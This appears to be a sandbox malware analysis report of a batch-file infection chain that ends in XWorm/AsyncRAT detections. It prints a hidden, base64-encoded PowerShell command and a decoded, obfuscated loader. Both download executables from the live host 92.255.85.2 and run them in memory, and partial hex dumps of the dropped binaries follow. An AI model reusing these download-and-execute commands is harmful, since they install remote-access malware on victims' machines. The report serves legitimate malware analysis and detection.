                                                  Mar 26, 2025 04:20:13.465253115 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:13.556415081 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:13.772274971 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:13.967983007 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:13.972424030 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:14.212466002 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:14.864294052 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:15.060705900 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:15.062351942 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:15.302757025 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:18.818357944 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:19.015072107 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:19.016685963 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:19.256104946 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:25.435448885 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:25.631596088 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:25.634097099 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:25.881514072 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:27.395195007 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:27.590423107 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:27.592171907 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:27.834619045 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:31.703769922 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:31.899017096 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:31.900002003 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:32.148452044 CET43724972292.255.85.2192.168.2.4
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Mar 26, 2025 04:16:36.425180912 CET | 51879 | 53 | 192.168.2.4 | 1.1.1.1
                                                  Mar 26, 2025 04:16:36.521946907 CET | 53 | 51879 | 1.1.1.1 | 192.168.2.4
                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                  Mar 26, 2025 04:16:36.425180912 CET | 192.168.2.4 | 1.1.1.1 | 0x62a4 | Standard query (0) | c.pki.goog | A (IP address) | IN (0x0001) | false
                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                  Mar 26, 2025 04:16:36.221071959 CET | 1.1.1.1 | 192.168.2.4 | 0x4c8f | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 208.89.73.19 | A (IP address) | IN (0x0001) | false
                                                  Mar 26, 2025 04:16:36.221071959 CET | 1.1.1.1 | 192.168.2.4 | 0x4c8f | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 208.89.73.23 | A (IP address) | IN (0x0001) | false
                                                  Mar 26, 2025 04:16:36.221071959 CET | 1.1.1.1 | 192.168.2.4 | 0x4c8f | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 208.89.73.27 | A (IP address) | IN (0x0001) | false
                                                  Mar 26, 2025 04:16:36.221071959 CET | 1.1.1.1 | 192.168.2.4 | 0x4c8f | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 208.89.73.21 | A (IP address) | IN (0x0001) | false
                                                  Mar 26, 2025 04:16:36.221071959 CET | 1.1.1.1 | 192.168.2.4 | 0x4c8f | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 208.89.73.31 | A (IP address) | IN (0x0001) | false
                                                  Mar 26, 2025 04:16:36.221071959 CET | 1.1.1.1 | 192.168.2.4 | 0x4c8f | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 208.89.73.29 | A (IP address) | IN (0x0001) | false
                                                  Mar 26, 2025 04:16:36.221071959 CET | 1.1.1.1 | 192.168.2.4 | 0x4c8f | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 208.89.73.25 | A (IP address) | IN (0x0001) | false
                                                  Mar 26, 2025 04:16:36.221071959 CET | 1.1.1.1 | 192.168.2.4 | 0x4c8f | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 208.89.73.17 | A (IP address) | IN (0x0001) | false
                                                  Mar 26, 2025 04:16:36.521946907 CET | 1.1.1.1 | 192.168.2.4 | 0x62a4 | No error (0) | c.pki.goog | pki-goog.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                  Mar 26, 2025 04:16:36.521946907 CET | 1.1.1.1 | 192.168.2.4 | 0x62a4 | No error (0) | pki-goog.l.google.com | | 142.250.80.35 | A (IP address) | IN (0x0001) | false
                                                  • 92.255.85.2
                                                  • c.pki.goog
                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  0 | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | 7872 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Mar 26, 2025 04:16:31.202980995 CET | 66 | OUT | GET /a.mp4 HTTP/1.1
                                                  Host: 92.255.85.2
                                                  Connection: Keep-Alive
                                                  Mar 26, 2025 04:16:31.401839018 CET | 630 | IN | HTTP/1.1 200 OK
                                                  Content-Type: video/mp4
                                                  Last-Modified: Tue, 25 Mar 2025 21:44:00 GMT
                                                  Accept-Ranges: bytes
                                                  ETag: "af92a5cf9ddb1:0"
                                                  Server: Microsoft-IIS/10.0
                                                  Date: Wed, 26 Mar 2025 03:16:31 GMT
                                                  Content-Length: 407
                                                  Data Raw: 24 64 67 75 65 74 42 57 71 30 4b 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 0d 0a 0d 0a 24 57 61 77 67 6c 43 4a 6d 65 4d 20 3d 20 22 73 76 50 73 32 68 73 76 50 73 32 74 73 76 50 73 32 74 73 76 50 73 32 70 73 76 50 73 32 3a 2f 2f 73 76 50 73 32 39 73 76 50 73 32 32 73 76 50 73 32 2e 73 76 50 73 32 32 73 76 50 73 32 35 73 76 50 73 32 35 73 76 50 73 32 2e 73 76 50 73 32 38 73 76 50 73 32 35 73 76 50 73 32 2e 73 76 50 73 32 32 73 76 50 73 32 2f 73 76 50 73 32 46 73 76 50 73 32 6f 73 76 50 73 32 78 73 76 50 73 32 2e 73 76 50 73 32 65 73 76 50 73 32 78 73 76 50 73 32 65 73 76 50 73 32 22 2e 52 65 70 6c 61 63 65 28 22 73 76 50 73 32 22 2c 20 22 22 29 0d 0a 0d 0a 24 52 39 75 33 61 74 20 3d 20 24 64 67 75 65 74 42 57 71 30 4b 2e 44 6f 77 6e 6c 6f 61 64 44 61 74 61 28 24 57 61 77 67 6c 43 4a 6d 65 4d 29 0d 0a 0d 0a 24 56 43 66 52 54 5a 20 3d 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 24 [TRUNCATED]
                                                  Data Ascii: $dguetBWq0K = New-Object System.Net.WebClient$WawglCJmeM = "svPs2hsvPs2tsvPs2tsvPs2psvPs2://svPs29svPs22svPs2.svPs22svPs25svPs25svPs2.svPs28svPs25svPs2.svPs22svPs2/svPs2FsvPs2osvPs2xsvPs2.svPs2esvPs2xsvPs2esvPs2".Replace("svPs2", "")$R9u3at = $dguetBWq0K.DownloadData($WawglCJmeM)$VCfRTZ = [System.Reflection.Assembly]::Load($R9u3at)$TWvCaa = $VCfRTZ.EntryPoint$TWvCaa.Invoke($null, @())
                                                  Mar 26, 2025 04:16:31.433971882 CET | 44 | OUT | GET /Fox.exe HTTP/1.1
                                                  Host: 92.255.85.2
                                                  Mar 26, 2025 04:16:31.628999949 CET | 1254 | IN | HTTP/1.1 200 OK
                                                  Content-Type: application/octet-stream
                                                  Last-Modified: Tue, 25 Mar 2025 21:42:34 GMT
                                                  Accept-Ranges: bytes
                                                  ETag: "24cc0d1ce9ddb1:0"
                                                  Server: Microsoft-IIS/10.0
                                                  Date: Wed, 26 Mar 2025 03:16:31 GMT
                                                  Content-Length: 497568
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 95 fc ac ec 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ae 06 00 00 cc 00 00 00 00 00 00 8e cc 06 00 00 20 00 00 00 e0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 07 00 00 02 00 00 6a bc 07 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 cc 06 00 57 00 00 00 00 e0 06 00 9c c8 00 00 00 00 00 00 00 00 00 00 00 7c 07 00 a0 1b 00 00 00 c0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ j`4W| H.text `.rsrc@@.relocz@BpH@]n*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*( *(!*("*(#*($*(%*(&*('*((*()*(**(+*(,*(-*(.*(/*(0*(1*(2*(3*(4*(5*(6*(7*(8*
                                                  Mar 26, 2025 04:16:31.629021883 CET | 1254 | IN | Data Raw: 28 39 01 00 06 2a 1e 00 28 3a 01 00 06 2a 1e 00 28 3b 01 00 06 2a 1e 00 28 3c 01 00 06 2a 1e 00 28 3d 01 00 06 2a 1e 00 28 3e 01 00 06 2a 1e 00 28 3f 01 00 06 2a 1e 00 28 40 01 00 06 2a 1e 00 28 41 01 00 06 2a 1e 00 28 42 01 00 06 2a 1e 00 28 43
                                                  Data Ascii: (9*(:*(;*(<*(=*(>*(?*(@*(A*(B*(C*(D*(E*(F*(G*(H*(I*(J*(K*(L*(M*(N*(O*(P*(Q*(R*(S*(T*(U*(V*(W
                                                  Mar 26, 2025 04:16:31.629035950 CET | 1254 | IN | Data Raw: 1e 00 28 d6 01 00 06 2a 1e 00 28 d7 01 00 06 2a 1e 00 28 d8 01 00 06 2a 1e 00 28 d9 01 00 06 2a 1e 00 28 da 01 00 06 2a 1e 00 28 db 01 00 06 2a 1e 00 28 dc 01 00 06 2a 1e 00 28 dd 01 00 06 2a 1e 00 28 de 01 00 06 2a 1e 00 28 df 01 00 06 2a 1e 00
                                                  Data Ascii: (*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(
                                                  Mar 26, 2025 04:16:31.629049063 CET | 1254 | IN | Data Raw: 06 2a 1e 00 28 73 02 00 06 2a 1e 00 28 74 02 00 06 2a 1e 00 28 75 02 00 06 2a 1e 00 28 76 02 00 06 2a 1e 00 28 77 02 00 06 2a 1e 00 28 78 02 00 06 2a 1e 00 28 79 02 00 06 2a 1e 00 28 7a 02 00 06 2a 1e 00 28 7b 02 00 06 2a 1e 00 28 7c 02 00 06 2a
                                                  Data Ascii: *(s*(t*(u*(v*(w*(x*(y*(z*({*(|*(}*(~*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*
                                                  Mar 26, 2025 04:16:31.629082918 CET | 1254 | IN | Data Raw: 03 00 06 2a 1e 00 28 10 03 00 06 2a 1e 00 28 11 03 00 06 2a 1e 00 28 12 03 00 06 2a 1e 00 28 13 03 00 06 2a 1e 00 28 14 03 00 06 2a 1e 00 28 15 03 00 06 2a 1e 00 28 16 03 00 06 2a 1e 00 28 17 03 00 06 2a 1e 00 28 18 03 00 06 2a 1e 00 28 19 03 00
                                                  Data Ascii: *(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*( *(!*("*(#*($*(%*(&*('*((*()*(**(+*(,*(-
                                                  Mar 26, 2025 04:16:31.629096031 CET | 1254 | IN | Data Raw: 28 ac 03 00 06 2a 1e 00 28 ad 03 00 06 2a 1e 00 28 ae 03 00 06 2a 1e 00 28 af 03 00 06 2a 1e 00 28 b0 03 00 06 2a 1e 00 28 b1 03 00 06 2a 1e 00 28 b2 03 00 06 2a 1e 00 28 b3 03 00 06 2a 1e 00 28 b4 03 00 06 2a 1e 00 28 b5 03 00 06 2a 1e 00 28 b6
                                                  Data Ascii: (*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(
                                                  Mar 26, 2025 04:16:31.629108906 CET | 1254 | IN | Data Raw: 1e 00 28 49 04 00 06 2a 1e 00 28 4a 04 00 06 2a 1e 00 28 4b 04 00 06 2a 1e 00 28 4c 04 00 06 2a 1e 00 28 4d 04 00 06 2a 1e 00 28 4e 04 00 06 2a 1e 00 28 4f 04 00 06 2a 1e 00 28 50 04 00 06 2a 1e 00 28 51 04 00 06 2a 1e 00 28 52 04 00 06 2a 1e 00
                                                  Data Ascii: (I*(J*(K*(L*(M*(N*(O*(P*(Q*(R*(S*(T*(U*(V*(W*(X*(Y*(Z*([*(\*(]*(^*(_*(`*(a*(b*(c*(d*(e*(f*(
                                                  Mar 26, 2025 04:16:31.629122972 CET | 1254 | IN | Data Raw: 06 2a 1e 00 28 e6 04 00 06 2a 1e 00 28 e7 04 00 06 2a 1e 00 28 e8 04 00 06 2a 1e 00 28 e9 04 00 06 2a 1e 00 28 ea 04 00 06 2a 1e 00 28 eb 04 00 06 2a 1e 00 28 ec 04 00 06 2a 1e 00 28 ed 04 00 06 2a 1e 00 28 ee 04 00 06 2a 1e 00 28 ef 04 00 06 2a
                                                  Data Ascii: *(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*
                                                  Mar 26, 2025 04:16:31.629137039 CET | 1254 | IN | Data Raw: 05 00 06 2a 1e 00 28 83 05 00 06 2a 1e 00 28 84 05 00 06 2a 1e 00 28 85 05 00 06 2a 1e 00 28 86 05 00 06 2a 1e 00 28 87 05 00 06 2a 1e 00 28 88 05 00 06 2a 1e 00 28 89 05 00 06 2a 1e 00 28 8a 05 00 06 2a 1e 00 28 8b 05 00 06 2a 1e 00 28 8c 05 00
                                                  Data Ascii: *(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(
                                                  Mar 26, 2025 04:16:31.629151106 CET | 1254 | IN | Data Raw: 28 1f 06 00 06 2a 1e 00 28 20 06 00 06 2a 1e 00 28 21 06 00 06 2a 1e 00 28 22 06 00 06 2a 1e 00 28 23 06 00 06 2a 1e 00 28 24 06 00 06 2a 1e 00 28 25 06 00 06 2a 1e 00 28 26 06 00 06 2a 1e 00 28 27 06 00 06 2a 1e 00 28 28 06 00 06 2a 1e 00 28 29
                                                  Data Ascii: (*( *(!*("*(#*($*(%*(&*('*((*()*(**(+*(,*(-*(.*(/*(0*(1*(2*(3*(4*(5*(6*(7*(8*(9*(:*(;*(<*(=
                                                  Mar 26, 2025 04:16:31.823343992 CET | 1254 | IN | Data Raw: 1e 00 28 bc 06 00 06 2a 1e 00 28 bd 06 00 06 2a 1e 00 28 be 06 00 06 2a 1e 00 28 bf 06 00 06 2a 1e 00 28 c0 06 00 06 2a 1e 00 28 c1 06 00 06 2a 1e 00 28 c2 06 00 06 2a 1e 00 28 c3 06 00 06 2a 1e 00 28 c4 06 00 06 2a 1e 00 28 c5 06 00 06 2a 1e 00
                                                  Data Ascii: (*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(
                                                  Mar 26, 2025 04:16:32.726084948 CET | 42 | OUT | GET /k.exe HTTP/1.1
                                                  Host: 92.255.85.2
                                                  Mar 26, 2025 04:16:32.920931101 CET | 1254 | IN | HTTP/1.1 200 OK
                                                  Content-Type: application/octet-stream
                                                  Last-Modified: Mon, 24 Mar 2025 16:34:54 GMT
                                                  Accept-Ranges: bytes
                                                  ETag: "6cef5acda9cdb1:0"
                                                  Server: Microsoft-IIS/10.0
                                                  Date: Wed, 26 Mar 2025 03:16:32 GMT
                                                  Content-Length: 33280
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ad 89 e1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 78 00 00 00 08 00 00 00 00 00 00 6e 97 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 97 00 00 4f 00 00 00 00 a0 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgxn @ @O H.texttw x `.rsrcz@@.reloc@BPH,OG(*(*ssss*0~o+*0~o+*0~o+*0~o+*0((+*0(+*0(+*0(+*0-(++++*0*(*0 ~-(+~+*(*0Mr [TRUNCATED]


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  1 | 192.168.2.4 | 49720 | 142.250.80.35 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Mar 26, 2025 04:16:36.623605013 CET | 202 | OUT | GET /r/gsr1.crl HTTP/1.1
                                                  Cache-Control: max-age = 3000
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                                  User-Agent: Microsoft-CryptoAPI/10.0
                                                  Host: c.pki.goog
                                                  Mar 26, 2025 04:16:36.713915110 CET | 222 | IN | HTTP/1.1 304 Not Modified
                                                  Date: Wed, 26 Mar 2025 03:03:27 GMT
                                                  Expires: Wed, 26 Mar 2025 03:53:27 GMT
                                                  Age: 789
                                                  Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                                  Cache-Control: public, max-age=3000
                                                  Vary: Accept-Encoding
                                                  Mar 26, 2025 04:16:36.718883991 CET | 200 | OUT | GET /r/r4.crl HTTP/1.1
                                                  Cache-Control: max-age = 3000
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                  User-Agent: Microsoft-CryptoAPI/10.0
                                                  Host: c.pki.goog
                                                  Mar 26, 2025 04:16:36.809873104 CET | 222 | IN | HTTP/1.1 304 Not Modified
                                                  Date: Wed, 26 Mar 2025 03:03:30 GMT
                                                  Expires: Wed, 26 Mar 2025 03:53:30 GMT
                                                  Age: 786
                                                  Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                  Cache-Control: public, max-age=3000
                                                  Vary: Accept-Encoding


                                                  Target ID:1
                                                  Start time:23:16:23
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" "
                                                  Imagebase:0x7ff67bb50000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:23:16:23
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff62fc20000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:23:16:24
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==
                                                  Imagebase:0x7ff7016f0000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:23:16:31
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"
                                                  Imagebase:0x7ff6af780000
                                                  File size:2'759'232 bytes
                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:23:16:32
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp" "c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP"
                                                  Imagebase:0x7ff674ee0000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:23:16:32
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  Imagebase:0xea0000
                                                  File size:262'432 bytes
                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.3715200506.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Executed Functions

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c7c97d7f6ab48074671d276624a525052fcdb89ccaa02cb3d789018a35346349
                                                  • Instruction ID: 72c265f286c68f1e74dcc1af1efa962d16120a30e7b31a5ebb24f5560ffd4100
                                                  • Opcode Fuzzy Hash: c7c97d7f6ab48074671d276624a525052fcdb89ccaa02cb3d789018a35346349
                                                  • Instruction Fuzzy Hash: 7B824632A0DBAE4FEB96D76848551B57FE1EF562A4B0801FBD04DC7193F9189C09C3A2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1c8d8b888d8efa9235c6b86d4d1a7c6fa18dd1dad59051a9db60d66618022bd
                                                  • Instruction ID: 958283b4cfdf77982edb60b9947065669ccfad326f22ae255399054a650449b5
                                                  • Opcode Fuzzy Hash: b1c8d8b888d8efa9235c6b86d4d1a7c6fa18dd1dad59051a9db60d66618022bd
                                                  • Instruction Fuzzy Hash: 58B11A6191EAEE4FEBA6976908252B57FE0DF56364B1800FBC049C70D3ED189C16D3A2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03b56e00658e5d9a55fd6a307ce5eba769921839ada4c3b4d3151c4272d832da
                                                  • Instruction ID: cf8c3a2587cfa1f5e4fb7fb90dc7b1821fa4021ed569f74ef102bd729514de0c
                                                  • Opcode Fuzzy Hash: 03b56e00658e5d9a55fd6a307ce5eba769921839ada4c3b4d3151c4272d832da
                                                  • Instruction Fuzzy Hash: 39514672D0DBAE4FE796DB6848546793BE1EF66294B4901FBC04CC7293E8149C09D392
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 46da49d18282ac9903bfc752c70ed770a5c131ec44c4c8e68206bd52823ae8f2
                                                  • Instruction ID: 1737d786bf0ca0afddafa82fe5517254ed637ca86bc14a8982a67c6d99f841e3
                                                  • Opcode Fuzzy Hash: 46da49d18282ac9903bfc752c70ed770a5c131ec44c4c8e68206bd52823ae8f2
                                                  • Instruction Fuzzy Hash: 82410B62E0EAEF4BFBE9D268446527896D2DF552D875800BAC40DC31D3FD0C9859E2A3
